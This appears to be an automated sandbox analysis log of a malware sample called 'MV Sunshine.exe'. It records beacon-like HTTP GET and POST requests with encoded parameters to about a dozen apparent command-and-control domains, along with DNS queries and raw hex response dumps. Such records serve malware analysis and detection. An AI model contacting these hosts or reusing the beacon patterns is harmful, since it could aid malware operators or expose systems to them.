Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_006925E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_006925E2

Source: global traffic	HTTP traffic detected: GET /4bhh/?CR=QnXHBNIHO&C4NDALSx=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnsbSmi+QanCgKDCOHomg85rhBTVZOXML7PcqWYx+hLfm17lEWK4= HTTP/1.1Host: www.39978.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /sciu/?C4NDALSx=YIkuFVuW2E28e4WkTeJVCzzknQiQ0fQ5lFYo7Kt/9G+eExaeK9iNv/1DyEL0uQ9QqookS/lhd7RPtmaZyJokLaTFYxZnfOv9cXS3nSZaLDRiuTmF2RHg/Rxj+O5CgW7JmZlVhRI=&CR=QnXHBNIHO HTTP/1.1Host: www.vnxoso88.artAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /7m52/?C4NDALSx=KUfzNxzC0/tkF/Sfag5rxehoMO8NdG75VoGUrTTYHgYMfDszE7nAAPd4WyzgZAEusu3dyfDqSmUHPfAxKZywGisUJnGlYgyjdPiRMJiII+hd/ZWCESvW+s+atoBx4v9eisrA7PU=&CR=QnXHBNIHO HTTP/1.1Host: www.rtpakuratkribo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /khsn/?C4NDALSx=TXD/9ddHP74eJYFExo0CjTUKkcm39u6VsxdqO5O9CqX8y9tdKNpr+RH/ydKFsRdYIeJS6PQWxoGMZT8zvmt3ARbyn6J1ZPnqMM4jEypbCT5wZptZz1V3DzfdhNy5ByxLujVEuGk=&CR=QnXHBNIHO HTTP/1.1Host: www.pluribiz.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /k45l/?CR=QnXHBNIHO&C4NDALSx=eEsmO3tqxgZhecFuD1iDKSUxkj6BCtqtHYZ6OUA3SqEwtG4TBmhjXYADabhkz5bgV/61+lmRmR6oEEDWXEosNqWwQc39IDQJRjeooDZzyDv7Bh8lrkRR4+ww5Wo2X3lAtFqtU/8= HTTP/1.1Host: www.idaschem.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /g8fb/?C4NDALSx=YIk8BARVWSn/QuGUQnkYsazoDYcX4x9RQfS4QBmHenTb8HDBBCrEcM3ZVamem1jnr3BtnBAXBF5diw+d30Gcstri1K8bQKUwmCuPwlz5Cfst33gL1mGdwQpdqLCFFHTDh8Wu1bM=&CR=QnXHBNIHO HTTP/1.1Host: www.b2iqd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /phav/?CR=QnXHBNIHO&C4NDALSx=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ0j57X7xdml97HV8TCJTDchmLx+R+oJJ2lMxnc8gWo/b1dM1vSs= HTTP/1.1Host: www.ipk.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /ezhm/?C4NDALSx=dQjGhxXMHv5+YwjryQcJrySkOGIlRyTTAmxJxQLZURFTEZTj1YJRXXyzUfzSUuBT8AWS6f5Uz3vbXV/G8YOf4LeGomdb6yirOaA+C9WTgdNIW32ObChxobUuNb9d8YJ7EaJFlMM=&CR=QnXHBNIHO HTTP/1.1Host: www.jigg.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /tqc2/?CR=QnXHBNIHO&C4NDALSx=EkjiWUwG3ohs+TM4TlGrX762MTxbJNqBztSStbX9jWSqgmIiHV+G9e22XLXvdY+CpYL3+KW1Lj2pkjsh45K8KkKZRC8tNqvToqyUp6DlGvulylRMCidvSnjGJ1LrCV2ZKyQ9V4A= HTTP/1.1Host: www.dccf.earthAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /igdb/?C4NDALSx=KXN5KYh60A7gMeE/7y9YbJzEbAj8u76Oa7v3ksdE5fh6bb2RqZZNkEsyTM378ew6A9/zEQ377mgRVV6fU1aJNg1uERy6ZujIlGDYuB/gpk9pFFHdCRPS72+AoRDwRP34Iqc3Ln0=&CR=QnXHBNIHO HTTP/1.1Host: www.gamebaitopzo.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /9tmz/?CR=QnXHBNIHO&C4NDALSx=NV1tTcsqNp6kYU/NXIxVbRYgayRVnArU9EiSb08h70XbT7GakAVreBKCJMPRzvHbWdCzhb2rvOXrdRlLN/AVomu3TdCoEKHP3SCjiZu9i/U3COyypdj/Vq8BuTuGkCsmGPVqh+s= HTTP/1.1Host: www.megaweb8.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2

Source: global traffic	DNS traffic detected: DNS query: www.39978.club
Source: global traffic	DNS traffic detected: DNS query: www.vnxoso88.art
Source: global traffic	DNS traffic detected: DNS query: www.rtpakuratkribo.xyz
Source: global traffic	DNS traffic detected: DNS query: www.pluribiz.life
Source: global traffic	DNS traffic detected: DNS query: www.idaschem.xyz
Source: global traffic	DNS traffic detected: DNS query: www.b2iqd.top
Source: global traffic	DNS traffic detected: DNS query: www.ipk.app
Source: global traffic	DNS traffic detected: DNS query: www.jigg.space
Source: global traffic	DNS traffic detected: DNS query: www.dccf.earth
Source: global traffic	DNS traffic detected: DNS query: www.gamebaitopzo.fun
Source: global traffic	DNS traffic detected: DNS query: www.megaweb8.top
Source: global traffic	DNS traffic detected: DNS query: www.wethebeststore.online

Source: unknown

HTTP traffic detected: POST /sciu/ HTTP/1.1Host: www.vnxoso88.artAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,enOrigin: http://www.vnxoso88.artCache-Control: max-age=0Content-Length: 213Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.vnxoso88.art/sciu/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2Data Raw: 43 34 4e 44 41 4c 53 78 3d 56 4b 4d 4f 47 6a 47 39 71 33 43 33 4b 59 44 35 53 38 4a 6a 59 77 72 34 6d 51 47 73 6a 2b 38 71 75 42 6f 4f 39 61 59 4c 7a 67 66 54 41 6a 32 2f 42 4f 32 57 76 38 56 4e 37 77 57 47 6d 57 4a 79 2b 4c 34 6a 59 66 74 68 4d 36 55 6b 6d 47 50 36 35 62 5a 56 53 2b 4c 5a 61 45 38 64 5a 34 6d 49 5a 57 4c 4f 6e 56 78 2f 42 45 77 56 2f 78 65 61 76 68 50 75 68 52 42 47 34 72 46 61 70 54 76 30 68 75 73 62 73 58 70 5a 41 39 76 41 32 69 52 46 2b 6f 52 45 35 73 55 79 6f 7a 65 61 6c 37 58 75 7a 64 50 7a 34 66 64 53 52 52 36 66 30 52 43 66 32 43 6f 56 39 68 7a 46 30 5a 43 64 53 55 34 6d 31 66 34 6e 67 49 38 77 59 53 72 2b Data Ascii: C4NDALSx=VKMOGjG9q3C3KYD5S8JjYwr4mQGsj+8quBoO9aYLzgfTAj2/BO2Wv8VN7wWGmWJy+L4jYfthM6UkmGP65bZVS+LZaE8dZ4mIZWLOnVx/BEwV/xeavhPuhRBG4rFapTv0husbsXpZA9vA2iRF+oRE5sUyozeal7XuzdPz4fdSRR6f0RCf2CoV9hzF0ZCdSU4m1f4ngI8wYSr+

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 04 Nov 2024 03:17:34 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 04 Nov 2024 03:17:36 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 04 Nov 2024 03:17:39 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 43 12 20 21 09 04 08 87 e3 86 d0 8e 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee c9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 da b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e 30 0e 53 f7 3e 70 43 3f a8 c0 f0 57 02 23 87 63 94 c0 a8 f7 b3 f6 96 1d f9 45 2f 03 30 51 9c 15 0f 83 7f f6 2e ed fd b4 d7 31 6c 82 63 38 f2 7e 2c b7 1c 27 4c fd 87 c1 4d 7f 62 15 7e 98 be eb fe cf ef ec 97 ae 5d 85 59 fa 05 88 9e 55 6e 71 a3 0f 27 2c f3 d8 02 ba d8 c7 99 1d fd 1f 6c f7 b5 c7 9f 05 34 72 bb d3 33 93 f7 b1 eb 01 2d 59 75 95 bd df ec 65 b8 78 d6 e2 8f e3 6f b2 0f 50 e4 da 02 6f 92 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 04 7d d5 2b 7b 69 6f 7b 5f 2d 2f 2b ab aa 4b 60 1d c7 bd 59 7c 41 cd b3 f9 87 08 f2 2f 7f b4 ba 70 ad 32 4b 3f 5f 8f 0d af d7 f7 90 fc cc 04 57 9c 5d 74 6a 57 17 b9 be 7c b7 2c 90 b7 df eb be 0f 14 37 1b be 4a 8b 5c da 87 fc f6 58 ea 81 01 1c ef 03 75 5d a1 b5 70 73 d7 02 36 03 61 e4 f9 e7 1b b9 9e fd ab 99 af bb 62 14 4e 13 f4 fb 69 af 63 93 4b 7b 1b bb 92 f2 96 23 eb 13 a1 7e 9d c4 7d 58 b9 49 79 43 e6 3b 92 30 80 a3 1f 5c 29 4c df 5c 99 c2 3f 01 da b5 3d 6e a8 bf e0 78 9f 55 55 96 3c 0c fa 3d de 84 ed f5 75 85 25 74 74 3d 78 a5 89 77 f4 6f d5 d0 9b fb de 71 ed ac b0 7a fb 3d 0c 40 48 71 8b 3e 08 bd df e8 55 e3 20 1e 31 ec 95 35 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 2d 10 67 9a 5b cf 79 65 02 a3 47 04 35 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 2b 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e5 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 e3 3e 8b 9d 37 29 7a 3d 5e 4b f9 a3 0e da ac 70 ee f7 00 23 11 c8 51 fd 9f 7b 2b 8e df 13 f8 25 a9 40 52 07 e0 1e 00 5d 81 2c 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 04 Nov 2024 03:17:42 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 37 32 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 